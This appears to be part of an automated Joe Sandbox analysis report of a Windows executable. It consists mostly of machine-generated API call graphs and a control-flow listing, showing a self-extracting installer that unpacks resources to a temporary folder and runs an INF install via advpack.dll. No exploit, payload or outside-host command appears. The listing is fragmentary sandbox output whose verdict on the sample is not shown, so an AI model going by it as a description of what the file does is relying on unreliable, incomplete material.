2602->2610 2605 6244b9 20 API calls 2603->2605 2606 623fa9 2604->2606 2607 623f75 FreeLibrary 2605->2607 2608 623f7c LocalFree 2606->2608 2607->2608 2609 626285 GetLastError 2608->2609 2609->2582 2610->2601 2610->2602 2611 623f40 FreeLibrary 2610->2611 2612 623eff FreeLibrary 2610->2612 2883 626495 2610->2883 2611->2595 2612->2596 2614 62468f 7 API calls 2613->2614 2615 62417d LocalAlloc 2614->2615 2616 624195 2615->2616 2617 6241a8 2615->2617 2618 6244b9 20 API calls 2616->2618 2619 62468f 7 API calls 2617->2619 2620 6241a6 2618->2620 2621 6241b5 2619->2621 2620->2200 2622 6241c5 lstrcmpA 2621->2622 2624 6241b9 2621->2624 2623 6241e6 LocalFree 2622->2623 2622->2624 2623->2620 2625 6244b9 20 API calls 2624->2625 2625->2623 2627 62303c 2626->2627 2627->2200 2629 62171e _vsnprintf 2628->2629 2639 6262c9 FindResourceA 2629->2639 2631 626353 2633 626ce0 4 API calls 2631->2633 2632 6262cb LoadResource LockResource 2632->2631 2635 6262e0 2632->2635 2634 6251ca 2633->2634 2634->2492 2634->2493 2636 626355 FreeResource 2635->2636 2637 62631b FreeResource 2635->2637 2636->2631 2638 62171e _vsnprintf 2637->2638 2638->2639 2639->2631 2639->2632 2641 62548a 2640->2641 2659 62551a 2640->2659 2701 6253a1 2641->2701 2644 625581 2646 626ce0 4 API calls 2644->2646 2652 62559a 2646->2652 2647 62553b CreateDirectoryA 2653 625577 2647->2653 2654 625547 2647->2654 2648 62554d 2648->2644 2655 62597d 34 API calls 2648->2655 2649 625495 2649->2644 2650 6254c2 GetSystemInfo 2649->2650 2651 62550c 2649->2651 2662 6254da 2650->2662 2656 62658a CharPrevA 2651->2656 2652->2533 2664 622630 GetWindowsDirectoryA 2652->2664 2657 626285 GetLastError 2653->2657 2654->2648 2658 62555c 2655->2658 2656->2659 2660 62557c 2657->2660 2658->2644 2663 625568 RemoveDirectoryA 2658->2663 2712 6258c8 2659->2712 2660->2644 2661 62658a CharPrevA 2661->2651 2662->2651 2662->2661 2663->2644 2665 62265e 2664->2665 2666 62266f 2664->2666 2667 6244b9 20 API calls 2665->2667 2668 626ce0 4 API calls 2666->2668 2667->2666 2669 622687 2668->2669 2669->2520 2669->2534 2671 6269a1 2670->2671 2672 62696e GetDiskFreeSpaceA 2670->2672 2671->2543 2672->2671 2673 626989 MulDiv 2672->2673 2673->2671 2675 6259bb 2674->2675 2676 6259dd GetDiskFreeSpaceA 2674->2676 2677 6244b9 20 API calls 2675->2677 2678 625ba1 memset 2676->2678 2679 625a21 MulDiv 2676->2679 2680 6259cc 2677->2680 2681 626285 GetLastError 2678->2681 2679->2678 2682 625a50 GetVolumeInformationA 2679->2682 2683 626285 GetLastError 2680->2683 2684 625bbc GetLastError FormatMessageA 2681->2684 2685 625ab5 SetCurrentDirectoryA 2682->2685 2686 625a6e memset 2682->2686 2698 6259d1 2683->2698 2687 625be3 2684->2687 2695 625acc 2685->2695 2688 626285 GetLastError 2686->2688 2690 6244b9 20 API calls 2687->2690 2691 625a89 GetLastError FormatMessageA 2688->2691 2689 625b94 2692 626ce0 4 API calls 2689->2692 2693 625bf5 SetCurrentDirectoryA 2690->2693 2691->2687 2694 625c11 2692->2694 2693->2689 2694->2520 2696 625b0a 2695->2696 2699 625b20 2695->2699 2697 6244b9 20 API calls 2696->2697 2697->2698 2698->2689 2699->2689 2724 62268b 2699->2724 2703 6253bf 2701->2703 2702 62171e _vsnprintf 2702->2703 2703->2702 2704 62658a CharPrevA 2703->2704 2707 625415 GetTempFileNameA 2703->2707 2705 6253fa RemoveDirectoryA GetFileAttributesA 2704->2705 2705->2703 2706 62544f CreateDirectoryA 2705->2706 2706->2707 2708 62543a 2706->2708 2707->2708 2709 625429 DeleteFileA CreateDirectoryA 2707->2709 2710 626ce0 4 API calls 2708->2710 2709->2708 2711 625449 2710->2711 2711->2649 2713 6258d8 2712->2713 2713->2713 2714 6258df LocalAlloc 2713->2714 2715 6258f3 2714->2715 2716 625919 2714->2716 2717 6244b9 20 API calls 2715->2717 2719 62658a CharPrevA 2716->2719 2718 625906 2717->2718 2720 626285 GetLastError 2718->2720 2722 625534 2718->2722 2721 625931 CreateFileA LocalFree 2719->2721 2720->2722 2721->2718 2723 62595b CloseHandle GetFileAttributesA 2721->2723 2722->2647 2722->2648 2723->2718 2725 6226e5 2724->2725 2726 6226b9 2724->2726 2728 6226ea 2725->2728 2729 62271f 2725->2729 2727 62171e _vsnprintf 2726->2727 2731 6226cc 2727->2731 2732 62171e _vsnprintf 2728->2732 2730 6226e3 2729->2730 2733 62171e _vsnprintf 2729->2733 2734 626ce0 4 API calls 2730->2734 2735 6244b9 20 API calls 2731->2735 2736 6226fd 2732->2736 2737 622735 2733->2737 2738 62276d 2734->2738 2735->2730 2739 6244b9 20 API calls 2736->2739 2740 6244b9 20 API calls 2737->2740 2738->2689 2739->2730 2740->2730 2742 62468f 7 API calls 2741->2742 2743 624ff5 FindResourceA LoadResource LockResource 2742->2743 2744 625020 2743->2744 2745 62515f 2743->2745 2746 625057 2744->2746 2747 625029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2744->2747 2745->2562 2763 624efd 2746->2763 2747->2746 2750 625060 2751 6244b9 20 API calls 2750->2751 2758 625075 2751->2758 2752 6250e8 2754 6244b9 20 API calls 2752->2754 2753 625106 2755 625110 FreeResource 2753->2755 2756 62511d 2753->2756 2754->2758 2755->2756 2759 62513a 2756->2759 2760 625129 2756->2760 2757 62507c 2757->2752 2757->2753 2758->2753 2759->2745 2762 62514c SendMessageA 2759->2762 2761 6244b9 20 API calls 2760->2761 2761->2759 2762->2745 2764 624f4a 2763->2764 2770 624fa1 2764->2770 2771 624980 2764->2771 2767 626ce0 4 API calls 2768 624fc6 2767->2768 2768->2750 2768->2757 2770->2767 2772 624990 2771->2772 2773 6249c2 lstrcmpA 2772->2773 2774 6249a5 2772->2774 2776 6249ba 2773->2776 2777 624a0e 2773->2777 2775 6244b9 20 API calls 2774->2775 2775->2776 2776->2770 2779 624b60 2776->2779 2777->2776 2782 62487a 2777->2782 2780 624b92 CloseHandle 2779->2780 2781 624b76 2779->2781 2780->2781 2781->2770 2784 6248a2 CreateFileA 2782->2784 2785 624908 2784->2785 2786 6248e9 2784->2786 2785->2776 2786->2785 2787 6248ee 2786->2787 2790 62490c 2787->2790 2791 6248f5 CreateFileA 2790->2791 2793 624917 2790->2793 2791->2785 2792 624962 CharNextA 2792->2793 2793->2791 2793->2792 2794 624953 CreateDirectoryA 2793->2794 2794->2792 2796 622510 2795->2796 2797 62255b 2795->2797 2798 62658a CharPrevA 2796->2798 2799 626ce0 4 API calls 2797->2799 2800 622522 WritePrivateProfileStringA _lopen 2798->2800 2801 622569 2799->2801 2800->2797 2802 622548 _llseek _lclose 2800->2802 2801->2571 2802->2797 2804 621b25 2803->2804 2907 621a84 2804->2907 2806 621b57 2807 62658a CharPrevA 2806->2807 2808 621b8c 2806->2808 2807->2808 2809 6266c8 2 API calls 2808->2809 2810 621bd1 2809->2810 2811 621d73 2810->2811 2812 621bd9 CompareStringA 2810->2812 2813 6266c8 2 API calls 2811->2813 2812->2811 2814 621bf7 GetFileAttributesA 2812->2814 2817 621d7d 2813->2817 2815 621d53 2814->2815 2816 621c0d 2814->2816 2822 6244b9 20 API calls 2815->2822 2816->2815 2820 621a84 2 API calls 2816->2820 2818 621d81 CompareStringA 2817->2818 2819 621df8 LocalAlloc 2817->2819 2818->2819 2828 621d9b 2818->2828 2819->2815 2821 621e0b GetFileAttributesA 2819->2821 2823 621c31 2820->2823 2824 621e45 2821->2824 2825 621e1d 2821->2825 2841 621cc2 2822->2841 2826 621c50 LocalAlloc 2823->2826 2831 621a84 2 API calls 2823->2831 2913 622aac 2824->2913 2825->2824 2826->2815 2829 621c67 GetPrivateProfileIntA GetPrivateProfileStringA 2826->2829 2827 621e89 2830 626ce0 4 API calls 2827->2830 2828->2828 2832 621dbe LocalAlloc 2828->2832 2837 621cf8 2829->2837 2829->2841 2835 621ea1 2830->2835 2831->2826 2832->2815 2836 621de1 2832->2836 2835->2592 2840 62171e _vsnprintf 2836->2840 2838 621d23 2837->2838 2839 621d09 GetShortPathNameA 2837->2839 2842 62171e _vsnprintf 2838->2842 2839->2838 2840->2841 2841->2827 2842->2841 2844 622256 2843->2844 2845 62209a 2843->2845 2846 626ce0 4 API calls 2844->2846 2848 62171e _vsnprintf 2845->2848 2850 6220dc 2845->2850 2847 622263 2846->2847 2847->2592 2849 6220af RegQueryValueExA 2848->2849 2849->2845 2849->2850 2851 6220e4 RegCloseKey 2850->2851 2852 6220fb GetSystemDirectoryA 2850->2852 2851->2844 2853 62658a CharPrevA 2852->2853 2854 62211b LoadLibraryA 2853->2854 2855 622179 GetModuleFileNameA 2854->2855 2856 62212e GetProcAddress FreeLibrary 2854->2856 2858 6221de RegCloseKey 2855->2858 2861 622177 2855->2861 2856->2855 2857 62214e GetSystemDirectoryA 2856->2857 2859 622165 2857->2859 2857->2861 2858->2844 2860 62658a CharPrevA 2859->2860 2860->2861 2861->2861 2862 6221b7 LocalAlloc 2861->2862 2863 6221ec 2862->2863 2864 6221cd 2862->2864 2866 62171e _vsnprintf 2863->2866 2865 6244b9 20 API calls 2864->2865 2865->2858 2867 622218 RegSetValueExA RegCloseKey LocalFree 2866->2867 2867->2844 2870 624016 CreateProcessA 2869->2870 2871 624106 2869->2871 2872 624041 WaitForSingleObject GetExitCodeProcess 2870->2872 2873 6240c4 2870->2873 2874 626ce0 4 API calls 2871->2874 2875 624070 2872->2875 2877 626285 GetLastError 2873->2877 2876 624117 2874->2876 2940 62411b 2875->2940 2876->2592 2879 6240c9 GetLastError FormatMessageA 2877->2879 2881 6244b9 20 API calls 2879->2881 2880 624096 CloseHandle CloseHandle 2880->2871 2882 6240ba 2880->2882 2881->2871 2882->2871 2884 6264c2 2883->2884 2885 62658a CharPrevA 2884->2885 2886 6264d8 GetFileAttributesA 2885->2886 2887 626501 LoadLibraryA 2886->2887 2888 6264ea 2886->2888 2890 626508 2887->2890 2888->2887 2889 6264ee LoadLibraryExA 2888->2889 2889->2890 2891 626ce0 4 API calls 2890->2891 2892 626513 2891->2892 2892->2610 2894 622381 2893->2894 2895 622289 RegOpenKeyExA 2893->2895 2896 626ce0 4 API calls 2894->2896 2895->2894 2897 6222b1 RegQueryValueExA 2895->2897 2898 62238c 2896->2898 2899 6222e6 memset GetSystemDirectoryA 2897->2899 2900 622374 RegCloseKey 2897->2900 2898->2584 2901 622321 2899->2901 2902 62230f 2899->2902 2900->2894 2904 62171e _vsnprintf 2901->2904 2903 62658a CharPrevA 2902->2903 2903->2901 2905 62233f RegSetValueExA 2904->2905 2905->2900 2908 621a9a 2907->2908 2910 621aba 2908->2910 2912 621aaf 2908->2912 2926 62667f 2908->2926 2910->2806 2911 62667f 2 API calls 2911->2912 2912->2910 2912->2911 2914 622ad4 GetModuleFileNameA 2913->2914 2915 622be6 2913->2915 2925 622b02 2914->2925 2916 626ce0 4 API calls 2915->2916 2918 622bf5 2916->2918 2917 622af1 IsDBCSLeadByte 2917->2925 2918->2827 2919 622b11 CharNextA CharUpperA 2921 622b8d CharUpperA 2919->2921 2919->2925 2920 622bca CharNextA 2922 622bd3 CharNextA 2920->2922 2921->2925 2922->2925 2924 622b43 CharPrevA 2924->2925 2925->2915 2925->2917 2925->2919 2925->2920 2925->2922 2925->2924 2931 6265e8 2925->2931 2927 626689 2926->2927 2928 6266a5 2927->2928 2929 626648 IsDBCSLeadByte 2927->2929 2930 626697 CharNextA 2927->2930 2928->2908 2929->2927 2930->2927 2932 6265f4 2931->2932 2932->2932 2933 6265fb CharPrevA 2932->2933 2934 626611 CharPrevA 2933->2934 2935 62660b 2934->2935 2936 62661e 2934->2936 2935->2934 2935->2936 2937 62663d 2936->2937 2938 626627 CharPrevA 2936->2938 2939 626634 CharNextA 2936->2939 2937->2925 2938->2937 2938->2939 2939->2937 2941 624132 2940->2941 2943 62412a 2940->2943 2944 621ea7 2941->2944 2943->2880 2945 621eba 2944->2945 2946 621ed3 2944->2946 2947 62256d 15 API calls 2945->2947 2946->2943 2947->2946 2949 621ff0 RegOpenKeyExA 2948->2949 2950 622026 2948->2950 2949->2950 2951 62200f RegDeleteValueA RegCloseKey 2949->2951 2950->2209 2951->2950 2952 624cc0 GlobalFree 2953 624ca0 GlobalAlloc 3017 623100 3018 6231b0 3017->3018 3019 623111 3017->3019 3021 6231b9 SendDlgItemMessageA 3018->3021 3024 623141 3018->3024 3020 62311d 3019->3020 3022 623149 GetDesktopWindow 3019->3022 3023 623138 EndDialog 3020->3023 3020->3024 3021->3024 3027 6243d0 6 API calls 3022->3027 3023->3024 3029 624463 SetWindowPos 3027->3029 3030 626ce0 4 API calls 3029->3030 3031 62315d 6 API calls 3030->3031 3031->3024 3032 6219e0 3033 621a03 3032->3033 3034 621a24 GetDesktopWindow 3032->3034 3035 621a20 3033->3035 3037 621a16 EndDialog 3033->3037 3036 6243d0 11 API calls 3034->3036 3039 626ce0 4 API calls 3035->3039 3038 621a33 LoadStringA SetDlgItemTextA MessageBeep 3036->3038 3037->3035 3038->3035 3040 621a7e 3039->3040 3041 624bc0 3043 624bd7 3041->3043 3044 624c05 3041->3044 3042 624c1b SetFilePointer 3042->3043 3044->3042 3044->3043 3045 6230c0 3046 6230de CallWindowProcA 3045->3046 3047 6230ce 3045->3047 3048 6230da 3046->3048 3047->3046 3047->3048 2954 624cd0 2955 624cf4 2954->2955 2956 624d0b 2954->2956 2957 624d02 2955->2957 2958 624b60 CloseHandle 2955->2958 2956->2957 2959 624dcb 2956->2959 2963 624d25 2956->2963 2960 626ce0 4 API calls 2957->2960 2958->2957 2961 624dd4 SetDlgItemTextA 2959->2961 2964 624de3 2959->2964 2962 624e95 2960->2962 2961->2964 2963->2957 2977 624c37 2963->2977 2964->2957 2982 62476d 2964->2982 2967 624e38 2967->2957 2969 624980 25 API calls 2967->2969 2971 624e56 2969->2971 2970 624b60 CloseHandle 2972 624d99 SetFileAttributesA 2970->2972 2971->2957 2973 624e64 2971->2973 2972->2957 2991 6247e0 LocalAlloc 2973->2991 2976 624e6f 2976->2957 2978 624c4c DosDateTimeToFileTime 2977->2978 2979 624c88 2977->2979 2978->2979 2980 624c5e LocalFileTimeToFileTime 2978->2980 2979->2957 2979->2970 2980->2979 2981 624c70 SetFileTime 2980->2981 2981->2979 3000 6266ae GetFileAttributesA 2982->3000 2984 62477b 2984->2967 2985 6247cc SetFileAttributesA 2986 6247db 2985->2986 2986->2967 2988 626517 24 API calls 2989 6247b1 2988->2989 2989->2985 2989->2986 2990 6247c2 2989->2990 2990->2985 2992 6247f6 2991->2992 2993 62480f LocalAlloc 2991->2993 2994 6244b9 20 API calls 2992->2994 2996 624831 2993->2996 2999 62480b 2993->2999 2994->2999 2997 6244b9 20 API calls 2996->2997 2998 624846 LocalFree 2997->2998 2998->2999 2999->2976 3001 624777 3000->3001 3001->2984 3001->2985 3001->2988 3002 624ad0 3010 623680 3002->3010 3005 624ae9 3006 624aee WriteFile 3007 624b14 3006->3007 3008 624b0f 3006->3008 3007->3008 3009 624b3b SendDlgItemMessageA 3007->3009 3009->3008 3011 623691 MsgWaitForMultipleObjects 3010->3011 3012 6236e8 3011->3012 3013 6236a9 PeekMessageA 3011->3013 3012->3005 3012->3006 3013->3011 3016 6236bc 3013->3016 3014 6236c7 DispatchMessageA 3015 6236d1 PeekMessageA 3014->3015 3015->3016 3016->3011 3016->3012 3016->3014 3016->3015 3049 627270 _except_handler4_common 3050 624a50 3051 624a9f ReadFile 3050->3051 3053 624a66 3050->3053 3052 624abb 3051->3052 3053->3052 3054 624a82 memcpy 3053->3054 3054->3052 3055 623210 3056 623227 3055->3056 3081 62328e EndDialog 3055->3081 3057 6233e2 GetDesktopWindow 3056->3057 3060 623235 3056->3060 3059 6243d0 11 API calls 3057->3059 3061 6233f1 SetWindowTextA SendDlgItemMessageA 3059->3061 3062 62324c 3060->3062 3063 6232dd GetDlgItemTextA 3060->3063 3073 623239 3060->3073 3064 62341f GetDlgItem EnableWindow 3061->3064 3061->3073 3066 623251 3062->3066 3067 6232c5 EndDialog 3062->3067 3065 623366 3063->3065 3074 6232fc 3063->3074 3064->3073 3069 6244b9 20 API calls 3065->3069 3068 62325c LoadStringA 3066->3068 3066->3073 3067->3073 3070 623294 3068->3070 3071 62327b 3068->3071 3069->3073 3093 624224 LoadLibraryA 3070->3093 3077 6244b9 20 API calls 3071->3077 3074->3065 3076 623331 GetFileAttributesA 3074->3076 3079 62333f 3076->3079 3080 62337c 3076->3080 3077->3081 3078 6232a5 SetDlgItemTextA 3078->3071 3078->3073 3083 6244b9 20 API calls 3079->3083 3082 62658a CharPrevA 3080->3082 3081->3073 3085 62338d 3082->3085 3084 623351 3083->3084 3084->3073 3086 62335a CreateDirectoryA 3084->3086 3087 6258c8 27 API calls 3085->3087 3086->3065 3086->3080 3088 623394 3087->3088 3088->3065 3089 6233a4 3088->3089 3090 6233c7 EndDialog 3089->3090 3091 62597d 34 API calls 3089->3091 3090->3073 3092 6233c3 3091->3092 3092->3073 3092->3090 3094 6243b2 3093->3094 3095 624246 GetProcAddress 3093->3095 3099 6244b9 20 API calls 3094->3099 3096 6243a4 FreeLibrary 3095->3096 3097 62425d GetProcAddress 3095->3097 3096->3094 3097->3096 3098 624274 GetProcAddress 3097->3098 3098->3096 3100 62428b 3098->3100 3101 62329d 3099->3101 3102 624295 GetTempPathA 3100->3102 3107 6242e1 3100->3107 3101->3073 3101->3078 3103 6242ad 3102->3103 3103->3103 3104 6242b4 CharPrevA 3103->3104 3105 6242d0 CharPrevA 3104->3105 3104->3107 3105->3107 3106 624390 FreeLibrary 3106->3101 3107->3106 3108 6234f0 3109 623504 3108->3109 3110 6235b8 3108->3110 3109->3110 3111 62351b 3109->3111 3112 6235be GetDesktopWindow 3109->3112 3113 623671 EndDialog 3110->3113 3118 623526 3110->3118 3115 62354f 3111->3115 3116 62351f 3111->3116 3114 6243d0 11 API calls 3112->3114 3113->3118 3117 6235d6 3114->3117 3115->3118 3120 623559 ResetEvent 3115->3120 3116->3118 3119 62352d TerminateThread EndDialog 3116->3119 3121 6235e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3117->3121 3122 62361d SetWindowTextA CreateThread 3117->3122 3119->3118 3123 6244b9 20 API calls 3120->3123 3121->3122 3122->3118 3124 623646 3122->3124 3125 623581 3123->3125 3126 6244b9 20 API calls 3124->3126 3127 62359b SetEvent 3125->3127 3128 62358a SetEvent 3125->3128 3126->3110 3129 623680 4 API calls 3127->3129 3128->3118 3129->3110

                                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                                            callgraph 0 Function_00624B60 1 Function_00626760 2 Function_00626A60 3 Function_00627060 2->3 16 Function_0062724D 2->16 19 Function_00627155 2->19 28 Function_00626C3F 2->28 31 Function_00627208 2->31 58 Function_00622BFB 2->58 20 Function_00627120 3->20 34 Function_00627010 3->34 4 Function_00625467 14 Function_0062597D 4->14 42 Function_00626CE0 4->42 64 Function_006258C8 4->64 75 Function_006253A1 4->75 84 Function_00621680 4->84 86 Function_00621781 4->86 88 Function_00626285 4->88 89 Function_0062658A 4->89 5 Function_00622267 39 Function_0062171E 5->39 5->42 5->89 6 Function_00625164 82 Function_006244B9 6->82 92 Function_0062468F 6->92 97 Function_00626298 6->97 7 Function_00624169 7->82 7->92 8 Function_0062256D 46 Function_006224E0 8->46 9 Function_0062476D 36 Function_00626517 9->36 78 Function_006266AE 9->78 10 Function_00622773 10->42 10->84 10->86 10->89 11 Function_00627270 12 Function_0062487A 32 Function_0062490C 12->32 13 Function_0062667F 15 Function_00626648 13->15 14->42 14->82 14->88 90 Function_0062268B 14->90 17 Function_00626952 18 Function_00624A50 21 Function_00623B26 21->36 44 Function_00624FE0 21->44 21->97 22 Function_00624224 22->82 22->84 23 Function_0062202A 23->39 23->42 23->82 23->89 24 Function_00626E2A 56 Function_00626CF0 24->56 25 Function_00622630 25->42 25->82 26 Function_00624C37 27 Function_00623A3F 27->36 27->82 27->88 27->92 29 Function_00624702 80 Function_006216B3 29->80 29->84 30 Function_00623100 70 Function_006243D0 30->70 33 Function_00623210 33->14 33->22 33->64 33->70 33->82 33->89 35 Function_00625C17 36->82 37 Function_0062411B 76 Function_00621EA7 37->76 38 Function_0062621E 38->14 38->42 38->82 38->88 40 Function_0062681F 40->42 59 Function_006266F9 40->59 41 Function_00622F1D 41->6 41->7 41->8 41->21 41->27 41->38 41->42 49 Function_006251E5 41->49 71 Function_00623BA2 41->71 73 Function_006255A0 41->73 41->82 41->88 41->89 42->56 43 Function_006247E0 43->82 43->84 60 Function_00624EFD 44->60 44->82 44->92 45 Function_006231E0 46->42 46->89 47 Function_006219E0 47->42 47->70 48 Function_00621FE1 49->82 49->88 49->92 50 Function_00621AE8 50->39 50->42 65 Function_006266C8 50->65 79 Function_00622AAC 50->79 50->80 50->82 50->84 50->86 87 Function_00621A84 50->87 50->89 51 Function_006228E8 51->10 91 Function_00622A89 51->91 52 Function_006265E8 53 Function_006236EE 53->40 53->42 53->51 67 Function_006267C9 53->67 53->82 53->91 54 Function_006217EE 54->42 55 Function_00623FEF 55->37 55->42 55->82 55->88 57 Function_006234F0 57->70 57->82 85 Function_00623680 57->85 58->41 77 Function_00622CAA 58->77 81 Function_006252B6 58->81 95 Function_00621F90 58->95 60->0 60->42 83 Function_00624980 60->83 61 Function_00624CC0 62 Function_00624BC0 63 Function_006230C0 64->82 64->84 64->88 64->89 65->15 66 Function_006217C8 93 Function_00626793 67->93 68 Function_00624AD0 68->85 69 Function_00624CD0 69->0 69->9 69->26 69->29 69->42 69->43 69->83 98 Function_00624E99 69->98 70->42 71->5 71->23 71->42 71->50 71->55 71->82 71->86 71->88 71->92 96 Function_00626495 71->96 72 Function_006218A3 72->42 72->54 73->4 73->14 73->17 73->25 73->36 73->42 73->82 73->86 73->88 73->89 73->92 74 Function_00624CA0 75->39 75->42 75->84 75->89 76->8 77->36 77->42 77->53 77->72 77->82 77->92 94 Function_00622390 77->94 99 Function_00625C9E 77->99 79->42 79->52 79->66 79->84 80->86 81->42 81->48 81->52 81->86 81->94 82->39 82->40 82->42 82->67 82->84 83->12 83->82 84->86 87->13 89->80 90->39 90->42 90->82 94->42 94->80 94->84 94->89 94->94 95->42 95->76 95->82 96->42 96->86 96->89 97->39 97->42 98->84 99->13 99->24 99->35 99->42 99->45 99->65 99->82 99->84 99->89

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00623BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 36 623ba2-623bd9 37 623bdb-623be7 call 62468f 36->37 38 623bfd-623bff 36->38 43 623bec-623bee 37->43 40 623c03-623c28 memset 38->40 41 623d35-623d48 call 621781 40->41 42 623c2e-623c40 call 62468f 40->42 50 623d4d-623d52 41->50 45 623d13-623d30 call 6244b9 42->45 53 623c46-623c49 42->53 43->45 46 623bf4-623bf7 43->46 58 623f4d 45->58 46->38 46->45 51 623d54-623d6c call 62468f 50->51 52 623d9e-623db6 call 621ae8 50->52 51->45 65 623d6e-623d75 51->65 52->58 69 623dbc-623dc2 52->69 53->45 56 623c4f-623c56 53->56 61 623c60-623c65 56->61 62 623c58-623c5e 56->62 59 623f4f-623f63 call 626ce0 58->59 67 623c67-623c6d 61->67 68 623c75-623c7c 61->68 66 623c6e-623c73 62->66 71 623fda-623fe1 65->71 72 623d7b-623d98 CompareStringA 65->72 73 623c87-623c89 66->73 67->66 68->73 76 623c7e-623c82 68->76 74 623de6-623de8 69->74 75 623dc4-623dce 69->75 77 623fe3 call 622267 71->77 78 623fe8-623fea 71->78 72->52 72->71 73->50 80 623c8f-623c98 73->80 81 623f0b-623f15 call 623fef 74->81 82 623dee-623df5 74->82 75->74 79 623dd0-623dd7 75->79 76->73 77->78 78->59 79->74 87 623dd9-623ddb 79->87 88 623cf1-623cf3 80->88 89 623c9a-623c9c 80->89 92 623f1a-623f1c 81->92 83 623fab-623fd2 call 6244b9 LocalFree 82->83 84 623dfb-623dfd 82->84 83->58 84->81 90 623e03-623e0a 84->90 87->82 93 623ddd-623de1 call 62202a 87->93 88->52 91 623cf9-623d11 call 62468f 88->91 95 623ca5-623ca7 89->95 96 623c9e-623ca3 89->96 90->81 98 623e10-623e19 call 626495 90->98 91->45 91->50 100 623f46-623f47 LocalFree 92->100 101 623f1e-623f2d LocalFree 92->101 93->74 95->58 97 623cad 95->97 104 623cb2-623cc5 call 62468f 96->104 97->104 113 623f92-623fa9 call 6244b9 98->113 114 623e1f-623e36 GetProcAddress 98->114 100->58 108 623f33-623f3b 101->108 109 623fd7-623fd9 101->109 104->45 112 623cc7-623ce8 CompareStringA 104->112 108->40 109->71 112->88 115 623cea-623ced 112->115 126 623f7c-623f90 LocalFree call 626285 113->126 116 623f64-623f76 call 6244b9 FreeLibrary 114->116 117 623e3c-623e80 114->117 115->88 116->126 120 623e82-623e87 117->120 121 623e8b-623e94 117->121 120->121 124 623e96-623e9b 121->124 125 623e9f-623ea2 121->125 124->125 128 623ea4-623ea9 125->128 129 623ead-623eb6 125->129 126->58 128->129 131 623ec1-623ec3 129->131 132 623eb8-623ebd 129->132 133 623ec5-623eca 131->133 134 623ece-623eec 131->134 132->131 133->134 137 623ef5-623efd 134->137 138 623eee-623ef3 134->138 139 623f40 FreeLibrary 137->139 140 623eff-623f09 FreeLibrary 137->140 138->137 139->100 140->101
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00623C11
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00623CDC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00628C42), ref: 00623D8F
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00623E26
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00628C42), ref: 00623EFF
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00628C42), ref: 00623F1F
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00628C42), ref: 00623F40
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00628C42), ref: 00623F47
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00628C42), ref: 00623F76
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00628C42), ref: 00623F80
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00628C42), ref: 00623FC2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
